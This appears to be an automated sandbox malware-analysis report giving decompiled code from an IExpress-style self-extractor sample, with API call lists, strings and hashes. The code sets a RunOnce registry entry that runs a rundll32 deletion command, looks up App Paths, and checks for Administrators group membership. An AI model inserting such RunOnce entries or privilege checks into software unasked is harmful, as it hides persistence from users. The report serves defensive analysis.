                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a9b518e1566c04becb496b705b4a72a58ad3b68166851cc9bfd5753256ae0800
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD310479240300BBD7611F39EC0DF6B3B69EB87B10F50452AF62695AA0CB718A80DB51
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                                                                                                              			E001A4224(char __ecx) {
                                                                                                                                                                                                                                              				char* _v8;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                              				char* _v28;
                                                                                                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                                                                                                              				intOrPtr _v36;
                                                                                                                                                                                                                                              				intOrPtr _v40;
                                                                                                                                                                                                                                              				char _v44;
                                                                                                                                                                                                                                              				char _v48;
                                                                                                                                                                                                                                              				char _v52;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                                              				char _t42;
                                                                                                                                                                                                                                              				char* _t44;
                                                                                                                                                                                                                                              				char* _t61;
                                                                                                                                                                                                                                              				void* _t63;
                                                                                                                                                                                                                                              				char* _t65;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                              				char _t67;
                                                                                                                                                                                                                                              				void* _t71;
                                                                                                                                                                                                                                              				char _t76;
                                                                                                                                                                                                                                              				intOrPtr _t85;
                                                                                                                                                                                                                                              
	_t67 = __ecx;
	_t66 = LoadLibraryA("SHELL32.DLL");
	if(_t66 == 0) {
		_t63 = 0x4c2;
		L22:
		E001A44B9(_t67, _t63, 0, 0, 0x10, 0);
		return 0;
	}
	_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
	_v12 = _t26;
	if(_t26 == 0) {
		L20:
		FreeLibrary(_t66);
		_t63 = 0x4c1;
		goto L22;
	}
	_t28 = GetProcAddress(_t66, 0xc3);
	_v20 = _t28;
	if(_t28 == 0) {
		goto L20;
	}
	_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
	_v16 = _t29;
	if(_t29 == 0) {
		goto L20;
	}
	_t76 =  *0x1a88c0; // 0x0
	if(_t76 != 0) {
		L10:
		 *0x1a87a0 = 0;
		_v52 = _t67;
		_v48 = 0;
		_v44 = 0;
		_v40 = 0x1a8598;
		_v36 = 1;
		_v32 = E001A4200;
		_v28 = 0x1a88c0;
		 *0x1aa288( &_v52);
		_t32 =  *_v12();
		if(_t71 != _t71) {
			asm("int 0x29");
		}
		_v12 = _t32;
		if(_t32 != 0) {
			 *0x1aa288(_t32, 0x1a88c0);
			 *_v16();
			if(_t71 != _t71) {
				asm("int 0x29");
			}
			if( *0x1a88c0 != 0) {
				E001A1680(0x1a87a0, 0x104, 0x1a88c0);
			}
			 *0x1aa288(_v12);
			 *_v20();
			if(_t71 != _t71) {
				asm("int 0x29");
			}
		}
		FreeLibrary(_t66);
		_t85 =  *0x1a87a0; // 0x0
		return 0 | _t85 != 0x00000000;
	} else {
		GetTempPathA(0x104, 0x1a88c0);
		_t61 = 0x1a88c0;
		_t4 =  &(_t61[1]); // 0x1a88c1
		_t65 = _t4;
		do {
			_t42 =  *_t61;
			_t61 =  &(_t61[1]);
		} while (_t42 != 0);
		_t5 = _t61 - _t65 + 0x1a88c0; // 0x351181
		_t44 = CharPrevA(0x1a88c0, _t5);
		_v8 = _t44;
		if( *_t44 == 0x5c &&  *(CharPrevA(0x1a88c0, _t44)) != 0x3a) {
			 *_v8 = 0;
		}
		goto L10;
	}
}




























                                                                                                                                                                                                                                              0x001a42a5
                                                                                                                                                                                                                                              0x001a42aa
                                                                                                                                                                                                                                              0x001a42aa
                                                                                                                                                                                                                                              0x001a42ad
                                                                                                                                                                                                                                              0x001a42ad
                                                                                                                                                                                                                                              0x001a42af
                                                                                                                                                                                                                                              0x001a42b0
                                                                                                                                                                                                                                              0x001a42b6
                                                                                                                                                                                                                                              0x001a42c2
                                                                                                                                                                                                                                              0x001a42c8
                                                                                                                                                                                                                                              0x001a42ce
                                                                                                                                                                                                                                              0x001a42e4
                                                                                                                                                                                                                                              0x001a42e4
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a42ce

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 001A4236
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 001A424C
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,000000C3), ref: 001A4263
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 001A427A
                                                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,001A88C0,?,00000001), ref: 001A429F
                                                                                                                                                                                                                                              • CharPrevA.USER32(001A88C0,00351181,?,00000001), ref: 001A42C2
                                                                                                                                                                                                                                              • CharPrevA.USER32(001A88C0,00000000,?,00000001), ref: 001A42D6
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 001A4391
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 001A43A5
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                              • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                              • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                              • Opcode ID: e393a4b6b34dfb4fd68a027bccabcfe904c1155d3f28b12fe9f98fb2dd5caa8d
                                                                                                                                                                                                                                              • Instruction ID: c645402eb8dd84ca201ccdb294559f6d2f707ef19b3d5c8fd970fb17a887eb14
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e393a4b6b34dfb4fd68a027bccabcfe904c1155d3f28b12fe9f98fb2dd5caa8d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE41D4BCE00214AFDB119BA4DC94A7EBBB4EF8B344F540169E941A3251CFB98C41C761
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                                                                              			E001A2773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				char _v269;
                                                                                                                                                                                                                                              				CHAR* _v276;
                                                                                                                                                                                                                                              				int _v280;
                                                                                                                                                                                                                                              				void* _v284;
                                                                                                                                                                                                                                              				int _v288;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t23;
                                                                                                                                                                                                                                              				intOrPtr _t34;
                                                                                                                                                                                                                                              				int _t45;
                                                                                                                                                                                                                                              				int* _t50;
                                                                                                                                                                                                                                              				CHAR* _t52;
                                                                                                                                                                                                                                              				CHAR* _t61;
                                                                                                                                                                                                                                              				char* _t62;
                                                                                                                                                                                                                                              				int _t63;
                                                                                                                                                                                                                                              				CHAR* _t64;
                                                                                                                                                                                                                                              				signed int _t65;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t52 = __ecx;
                                                                                                                                                                                                                                              				_t23 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                                                              				_t62 = _a4;
                                                                                                                                                                                                                                              				_t50 = 0;
                                                                                                                                                                                                                                              				_t61 = __ecx;
                                                                                                                                                                                                                                              				_v276 = _t62;
                                                                                                                                                                                                                                              				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                                                              				if( *_t62 != 0x23) {
                                                                                                                                                                                                                                              					_t63 = 0x104;
                                                                                                                                                                                                                                              					goto L14;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t64 = _t62 + 1;
                                                                                                                                                                                                                                              					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                                                              					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                                                              					_t63 = 0x104;
                                                                                                                                                                                                                                              					_t34 = _v269;
                                                                                                                                                                                                                                              					if(_t34 == 0x53) {
                                                                                                                                                                                                                                              						L14:
                                                                                                                                                                                                                                              						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                                                              						goto L15;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						if(_t34 == 0x57) {
                                                                                                                                                                                                                                              							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                                                              							goto L16;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_push(_t52);
                                                                                                                                                                                                                                              							_v288 = 0x104;
                                                                                                                                                                                                                                              							E001A1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                                                              							_t59 = 0x104;
                                                                                                                                                                                                                                              							E001A658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                                                              							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                                                              								L16:
                                                                                                                                                                                                                                              								_t59 = _t63;
                                                                                                                                                                                                                                              								E001A658A(_t61, _t63, _v276);
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								if(RegQueryValueExA(_v284, 0x1a1140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                                                              									_t45 = _v280;
                                                                                                                                                                                                                                              									if(_t45 != 2) {
                                                                                                                                                                                                                                              										L9:
                                                                                                                                                                                                                                              										if(_t45 == 1) {
                                                                                                                                                                                                                                              											goto L10;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                              											_t45 = _v280;
                                                                                                                                                                                                                                              											goto L9;
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											_t59 = 0x104;
                                                                                                                                                                                                                                              											E001A1680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                                                              											L10:
                                                                                                                                                                                                                                              											_t50 = 1;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								RegCloseKey(_v284);
                                                                                                                                                                                                                                              								L15:
                                                                                                                                                                                                                                              								if(_t50 == 0) {
                                                                                                                                                                                                                                              									goto L16;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E001A6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                                                              			}
























                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CharUpperA.USER32(56898003,00000000,00000000,00000000), ref: 001A27A8
                                                                                                                                                                                                                                              • CharNextA.USER32(0000054D), ref: 001A27B5
                                                                                                                                                                                                                                              • CharNextA.USER32(00000000), ref: 001A27BC
                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001A2829
                                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,001A1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001A2852
                                                                                                                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001A2870
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001A28A0
                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 001A28AA
                                                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 001A28B9
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 001A27E4
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                              • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                              • Opcode ID: 9955e002d83a40a54380675bdddafa1d0f02b77f25d9552e244c84110277c3e6
                                                                                                                                                                                                                                              • Instruction ID: 275a5a89afc70833ac51ffbd66a446534b3fa4e5d958962ff202fe9f5535e829
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9955e002d83a40a54380675bdddafa1d0f02b77f25d9552e244c84110277c3e6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B241A3B9A00128AFDB259B68DC85AFA77BDEF17700F0440A9F549D2100DB748EC6CFA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 62%
                                                                                                                                                                                                                                              			E001A2267() {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				char _v836;
                                                                                                                                                                                                                                              				void* _v840;
                                                                                                                                                                                                                                              				int _v844;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t19;
                                                                                                                                                                                                                                              				intOrPtr _t33;
                                                                                                                                                                                                                                              				void* _t38;
                                                                                                                                                                                                                                              				intOrPtr* _t42;
                                                                                                                                                                                                                                              				void* _t45;
                                                                                                                                                                                                                                              				void* _t47;
                                                                                                                                                                                                                                              				void* _t49;
                                                                                                                                                                                                                                              				signed int _t51;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t19 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                                                              				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                                                              				if( *0x1a8530 != 0) {
                                                                                                                                                                                                                                              					_push(_t49);
                                                                                                                                                                                                                                              					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                                                              						_push(_t38);
                                                                                                                                                                                                                                              						_v844 = 0x238;
                                                                                                                                                                                                                                              						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                                                              							_push(_t47);
                                                                                                                                                                                                                                              							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                              							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                              								E001A658A( &_v268, 0x104, 0x1a1140);
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_push("C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                              							E001A171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                                                              							_t42 =  &_v836;
                                                                                                                                                                                                                                              							_t45 = _t42 + 1;
                                                                                                                                                                                                                                              							_pop(_t47);
                                                                                                                                                                                                                                              							do {
                                                                                                                                                                                                                                              								_t33 =  *_t42;
                                                                                                                                                                                                                                              								_t42 = _t42 + 1;
                                                                                                                                                                                                                                              							} while (_t33 != 0);
                                                                                                                                                                                                                                              							RegSetValueExA(_v840, "wextract_cleanup1", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                                                              						_pop(_t38);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_pop(_t49);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E001A6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                                                              			}



















                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 001A22A3
                                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 001A22D8
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 001A22F5
                                                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 001A2305
                                                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 001A236E
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 001A237A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 001A2321
                                                                                                                                                                                                                                              • wextract_cleanup1, xrefs: 001A227C, 001A22CD, 001A2363
                                                                                                                                                                                                                                              • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 001A232D
                                                                                                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 001A2299
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
                                                                                                                                                                                                                                              • API String ID: 3027380567-2601155950
                                                                                                                                                                                                                                              • Opcode ID: 8c94dc31e68a5a6cd103e68595d23f9d3d3adb12e84911782074e801b2ec93c1
                                                                                                                                                                                                                                              • Instruction ID: bf54f59d4734f983b2d298527dabea245df5a632d16bf47d60e160bea1c32f9b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c94dc31e68a5a6cd103e68595d23f9d3d3adb12e84911782074e801b2ec93c1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C231C579A002186BDB219B64DD49FEB7B7CEF17710F4401A9F90DA6051EB70AB88CA50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                                                                                                              			E001A3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                              				void* _t8;
                                                                                                                                                                                                                                              				void* _t11;
                                                                                                                                                                                                                                              				void* _t15;
                                                                                                                                                                                                                                              				struct HWND__* _t16;
                                                                                                                                                                                                                                              				struct HWND__* _t33;
                                                                                                                                                                                                                                              				struct HWND__* _t34;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t8 = _a8 - 0xf;
                                                                                                                                                                                                                                              				if(_t8 == 0) {
                                                                                                                                                                                                                                              					if( *0x1a8590 == 0) {
                                                                                                                                                                                                                                              						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                                                              						 *0x1a8590 = 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L13:
                                                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t11 = _t8 - 1;
                                                                                                                                                                                                                                              				if(_t11 == 0) {
                                                                                                                                                                                                                                              					L7:
                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                              					L8:
                                                                                                                                                                                                                                              					EndDialog(_a4, ??);
                                                                                                                                                                                                                                              					L9:
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t15 = _t11 - 0x100;
                                                                                                                                                                                                                                              				if(_t15 == 0) {
                                                                                                                                                                                                                                              					_t16 = GetDesktopWindow();
                                                                                                                                                                                                                                              					_t33 = _a4;
                                                                                                                                                                                                                                              					E001A43D0(_t33, _t16);
                                                                                                                                                                                                                                              					SetDlgItemTextA(_t33, 0x834,  *0x1a8d4c);
                                                                                                                                                                                                                                              					SetWindowTextA(_t33, "lenta");
                                                                                                                                                                                                                                              					SetForegroundWindow(_t33);
                                                                                                                                                                                                                                              					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                                                              					 *0x1a88b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                                                              					SetWindowLongA(_t34, 0xfffffffc, E001A30C0);
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_t15 != 1) {
                                                                                                                                                                                                                                              					goto L13;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_a12 != 6) {
                                                                                                                                                                                                                                              					if(_a12 != 7) {
                                                                                                                                                                                                                                              						goto L9;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L7;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_push(1);
                                                                                                                                                                                                                                              				goto L8;
                                                                                                                                                                                                                                              			}










                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • EndDialog.USER32(?,00000000), ref: 001A313B
                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 001A314B
                                                                                                                                                                                                                                              • SetDlgItemTextA.USER32(?,00000834), ref: 001A316A
                                                                                                                                                                                                                                              • SetWindowTextA.USER32(?,lenta), ref: 001A3176
                                                                                                                                                                                                                                              • SetForegroundWindow.USER32(?), ref: 001A317D
                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000834), ref: 001A3185
                                                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000FC), ref: 001A3190
                                                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000FC,001A30C0), ref: 001A31A3
                                                                                                                                                                                                                                              • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 001A31CA
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                              • String ID: lenta
                                                                                                                                                                                                                                              • API String ID: 3785188418-2780258678
                                                                                                                                                                                                                                              • Opcode ID: 0988a6d4b20449d834defc4cffd2d22af6bb44fe63f569aebc6dc389340ada31
                                                                                                                                                                                                                                              • Instruction ID: 4d27cd5332b1e367e577593b68216616c89f0f7415f62de37f3bebc99a91bb95
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0988a6d4b20449d834defc4cffd2d22af6bb44fe63f569aebc6dc389340ada31
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A11D039644211BBDB216F64EC0CBAA3AA4FF4B720F504611F826D19E0DBB49A95C782
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

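C-Code - Quality: 91%
E001A18A3(void* __edx, void* __esi) {
	signed int _v8;
	short _v12;
	struct _SID_IDENTIFIER_AUTHORITY _v16;
	char _v20;
	long _v24;
	void* _v28;
	void* _v32;
	void* __ebx;
	void* __edi;
	signed int _t23;
	long _t45;
	void* _t49;
	int _t50;
	void* _t52;
	signed int _t53;

	_t51 = __esi;
	_t49 = __edx;
	_t23 =  *0x1a8004; // 0x56898003
	_v8 = _t23 ^ _t53;
	_t25 =  *0x1a8128; // 0x2
	_t45 = 0;
	// _v16/_v12 together form the identifier authority {0,0,0,0,0,5} (SECURITY_NT_AUTHORITY)
	_v12 = 0x500;
	_t50 = 2;
	_v16.Value = 0;
	_v20 = 0;
	// The global at 0x1a8128 holds the result; any value other than 2 skips the check
	if(_t25 != _t50) {
		L20:
		return E001A6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
	}
	if(E001A17EE( &_v20) != 0) {
		_t25 = _v20;
		if(_v20 != 0) {
			 *0x1a8128 = 1;
		}
		goto L20;
	}
	// 8 = TOKEN_QUERY
	if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
		goto L20;
	}
	// Information class 2 = TokenGroups; the first call only asks for the buffer size
	// and is expected to fail with 0x7a (ERROR_INSUFFICIENT_BUFFER)
	if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
		L17:
		CloseHandle(_v28);
		_t25 = _v20;
		goto L20;
	} else {
		_push(__esi);
		_t52 = LocalAlloc(0, _v24);
		if(_t52 == 0) {
			L16:
			_pop(_t51);
			goto L17;
		}
		// 0x20 = SECURITY_BUILTIN_DOMAIN_RID, 0x220 = DOMAIN_ALIAS_RID_ADMINS:
		// the SID built here is BUILTIN\Administrators (S-1-5-32-544)
		if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
			L15:
			LocalFree(_t52);
			goto L16;
		} else {
			// *_t52 is TOKEN_GROUPS.GroupCount
			if( *_t52 <= 0) {
				L14:
				FreeSid(_v32);
				goto L15;
			}
			_t15 = _t52 + 4; // 0x4
			_t50 = _t15;
			// Walk the 8-byte SID_AND_ATTRIBUTES entries, comparing each group SID to the Administrators SID
			while(EqualSid( *_t50, _v32) == 0) {
				_t45 = _t45 + 1;
				_t50 = _t50 + 8;
				if(_t45 <  *_t52) {
					continue;
				}
				goto L14;
			}
			// Match found: the process token lists the Administrators group
			 *0x1a8128 = 1;
			_v20 = 1;
			goto L14;
		}
	}
}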



















